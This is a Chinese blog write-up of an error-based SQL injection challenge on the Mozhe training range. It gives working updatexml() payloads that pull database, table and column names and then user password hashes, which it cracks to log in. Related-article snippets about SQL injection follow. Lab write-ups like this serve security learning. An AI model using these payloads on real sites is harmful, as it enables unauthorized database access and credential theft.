SQL注入之报错盲注(墨者学院)

最新推荐文章于 2024-10-03 01:54:42 发布
最新推荐文章于 2024-10-03 01:54:42 发布
阅读量3k 收藏 10
点赞数 1
分类专栏: 信息安全 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waxcj/article/details/124542828
版权
本文详细介绍了SQL报错注入的概念、步骤及应用,通过靶场环境展示了如何利用updatexml函数进行盲注,爆破数据库名、数据表、字段及内容,最终解密出隐藏的密码。过程中强调了报错注入在无回显情况下的优势和局限性,并演示了应对异常字符的方法。
摘要由CSDN通过智能技术生成

首先我们先来了解一下报错注入的基本概念

1:报错注入定义

报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。

2:报错注入前提

页面上没有回显点,但是必须有SQL语句执行错误的信息。

3:报错注入优缺点

优点:不需要显示位,如果有显示位建议使用union联合查询。

缺点:需要有SQL语句的报错信息。

4:构造报错注入的基本步骤

  1. 构造目标查询语句
  2. 选择报错注入函数
  3. 构造报错注入语句
  4. 拼接报错注入语句

5:常见的报错注入函数

updatexml();floor();extractvalue();等等,待会靶场需要使用的函数就是updatexml();

报错注入基本概念了解后就可以开始了

如图是靶场环境,根据网站的URL可以很明显的知道可能存在注入

首先我是先通过 and 1=1  和 and 1=2 来判断是否存在注入和注入类型,但是当我输入and 1=2 时发现网页既然没有出错,还是和 and 1=1 时一样

因为靶场已经告诉你这是报错盲注,所以直接开始使用报错注入语句

1:爆破数据库1' and updatexml(1,concat(0x7e,(select database()),0x7e),1 )--+  0x7e是~的16进制,concat()语句将多个字符串连接成一个字符串 , --+ 为空格

 2:爆破数据表' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'stormgroup' limit 0,1),0x7e),1 )--+爆出了两张数据表,猜测管理员等信息在member表中  注意要爆出notice表需要把limit0,1改为limit1,1

 

3:爆破字段' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = 'stormgroup' and table_name = 'member' limit 0,1),0x7e),1 )--+  出了name,password 还有status字段

 

 4:爆破字段内容' and updatexml(1,concat(0x7e,(select name from member limit 0,1),0x7e),1)--+

' and updatexml(1,concat(0x7e,(select password from member limit 0,1),0x7e),1)--+

 

用户名有两个都是 mozhe

 密码爆出两个使用MD5解密工具,但是当你去解密时你会发现解密不出来,因为密码长度为31位所以无法解密,但是MD5长度一般为16位或32位,猜测可能是最后一个字符没显示,在这里利用substr函数进行字符串截取

' and updatexml(1,concat(0x7e,(select substr(password,32,1) from member limit 0,1),0x7e),1)--+

 

 所以将密码拼接一下在进行解密  528469 和 480132

拿到密码后进行登录拿到了key

  今天的内容就到这了,点个赞在走吧^0^

 

 

LZsec
关注
专栏目录
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
SQL注入原理-报错盲注
T1ngSh0w的博客
09-14 967
SQL注入-报错盲注(updatexml()函数与extractvalue()函数)
sql报错注入:extractvalue、updatexml报错原理
weixin_33881140的博客
03-07 493
报错注入:extractvalue、updatexml报错原理 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的两个函数:extractvalue、updatexml 名称 描述 ExtractValue() 使用XPath表示法从XML字符串中提取值 UpdateXML() 返回替换的XML片段 通过这两个函数可以完成...
SQL注入报错注入方法汇总
最新发布
wanggonghanfei的博客
10-03 1832
响应过程:用户在前台页面输入检索内容后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面0.2 类型。
mysql盲注_二十八、MySQL盲注
weixin_39990401的博客
01-18 308
在学习本实验之前,请确保已经学过“SQL注入原理与实践”这个实验。在 SQL注入原理与实践 这个实验中,我们已经知道了SQL注入的原理,并且能够完成支持union 且有回显的注入,这种情况是最简单的,最容易注入的,那么,如果注入点发生在update、insert等这些不会有返回内容而仅仅只返回true或者false的 SQL语句中,或者仅仅select而没有输出查询的内容时,是不是就不能获取数据了...
SQL注入报错盲注详解
DM766924的博客
09-15 1840
报错显示的原理: 前提:MYSQL报错信息必须能够在页面回显。原理:通过MYSQL一些函数的限制条件让其报错,产生超出预期的结果,且报错信息中包含重要信息。要求:需要能够知道MYSQL中哪些函数有限制条件,利用限制条件进行报错,需要了解函数原理才知道熟悉运用。分类: 基于group by报错注入 基于xpath函数报错注入(5.1.1及以上,extractvalue和updatexml) 基于double数值类型超出范围报错注入(5.5.5及以上) 基于bignt溢出报错注入 基于数据重复性报错注入 报
SQLi LABS Less 14 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十四关,SQLi-LABS Less-14,SQLi-LABS Less 14,SQLiLABS Less14,SQLi Less 14
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者未必黑.pdf
12-26
不过,既然您提到了标题为“近墨者未必黑”,这是一个常用的成语,其含义是指周围环境或周围的人对一个人的影响并不是绝对的,一个人不一定因为接触了不良环境或不好的人就一定会变得不好。这个成语强调的是个人的...
墨者安全专家 3.7(更新)
11-03
1、墨者革离术 运用了墨者研发的新技术,结合权限管理的功能,有效防止防火墙和杀毒软件尚未识别的安全危险入侵,并在病毒库反应前把系统与安全隐患完全隔离,有效防止木马盗号等。 2、墨者查杀病毒 兼容主流杀毒...
SQL注入4之报错盲注
weixin_56218159的博客
05-27 398
SQL注入报错盲注详解 报错显示的原理 前提:MYSQL报错信息必须能够在页面回显 原理:通过MYSQL一些函数的限制条件让其报错,产生超出预期的结果,且报错信息中包含重要信息 要求:需要能够知道MYSQL中哪些函数有限制条件,利用限制条件进行报错,需要了解函数原理才知道熟悉运用 分类 》基于group by报错注入 》基于xpath函数报错注入(5.1.1及以上,extractvalue和updatexml) 》基于double数值类型超出范围报错注入(5.5.5及以上) 》基于bignt溢出
安全中级11:sql注入+联合、报错、时间盲注+sqlmap使用
weixin_62870380的博客
07-02 4573
sql注入的原理和流程,以及联合注入、报错注入、时间盲注、布尔盲注以及sqlmap使用。
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五关,SQLi-LABS Less-25,SQLi-LABS Less 25,SQLiLABS Less25,SQLi Less 25
SQL手工盲注 - 报错回显
精神病院逃出来的疯子写的博客
09-28 202
盲注就是在注入的过程中,获取的数据不能显示到前端页面,此时,我们需要利用一些方法进行判断或者尝试,我们称之为盲注报错回显就是其中的一种。
sql注入之查询方法和报错盲注 (16)
san3144393495的博客
04-24 703
当我们进行注入的时候,有很多注入会出现无回显得情况,就在注入的时候没有报错信息和一些东西给予提示的,这种情况是无回显,在前期的注入就没办法执行,我们需要他报出相关的数字,便于我们查询一些参数,如果出现无回显的情况就没变过进行了。出现这个无回显的原因,可能是sql查询方式有问题所导致的, 第二个原因是对方在sql语句执行之后这个结果显示它有一些显示上面的代码,他这个显示代码写的不当,不好,或者直接没写,也会导致这种无回显。一般结合表名和列名进行数据排序操作。会员或后台数据同步或缓存操作。
SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
VictorZhang
07-30 6175
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https://github.com/webattacker/sqli-labs 将Sqli-labs解压后整个目录拖拽到路劲:C:\wamp64\www 下 3.在浏览器上访问http://localhost...
day29WEB攻防-通用漏洞&SQL注入&盲注&延时&布尔&报错&增删改查
m0_69583059的博客
01-20 1392
因为时间盲注是运用于没有任何错误信息或者回显的注入情况,所以我们并不能从页面上获取我们发送的语句返回情况,由于发送请求到服务器回显是需要一段时间的,所以我们可以利用回显时间来判断服务器返回情况,其实就是在布尔盲注的基础上加上一个if语句,错误时让页面正常返回,正确时让页面延时返回,由此我们就可以通过返回时间来判断是否注入成功。用Burp爆破字母a的位置,即可得到数据库名每个位置上的字符。盲注就是在注入的过程中,获取的数据不能回显到前端页面,此时,我们要利用一些方法进行判断 或者尝试,这个过程称之为盲注
SQL注入之查询方式及报错盲注
m0_48907714的博客
04-02 4339
查询方式及报错盲注 注入无回显,可能是SQL语句查询方式的问题造成,这时我们需要用到相关的报错或者盲注进行后续操作 select 查询数据 select * from new where id=$id insert 插入数据 instert into news(id,url,text) valuse (2,‘x’,’$t’) delete 删除数据 delete from news where id=$id update更新数据 update user set pwd=’$p’ where
墨者学院sql注入布尔
07-27
墨者学院SQL注入布尔是一种常见的SQL注入攻击技术,它利用布尔逻辑来判断SQL查询的真假条件。通过构造恰当的SQL语句,攻击者可以绕过输入验证,直接操作数据库,从而获取、修改或删除敏感数据。 在布尔注入攻击中,攻击者通过不断尝试不同的条件,观察页面返回的结果来推断出数据库的信息。攻击者可以使用布尔逻辑运算符(如AND、OR)和条件语句(如等于、小于、大于等)来构造恶意的SQL查询。 为了防止SQL注入布尔攻击,开发人员应该采取以下预防措施: 1. 输入验证和过滤:对用户输入进行严格的验证和过滤,确保只接受合法的输入。 2. 参数化查询:使用参数化查询或预编译语句来构建SQL查询,这样可以将用户输入作为参数传递给查询,而不是直接拼接在SQL语句中。 3. 最小权限原则:为数据库用户分配最小权限,避免给予不必要的数据库操作权限。 4. 错误消息保护:在生产环境中,不要将详细的错误消息返回给用户,以免泄露敏感信息。 希望这能帮到你!如果有任何其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值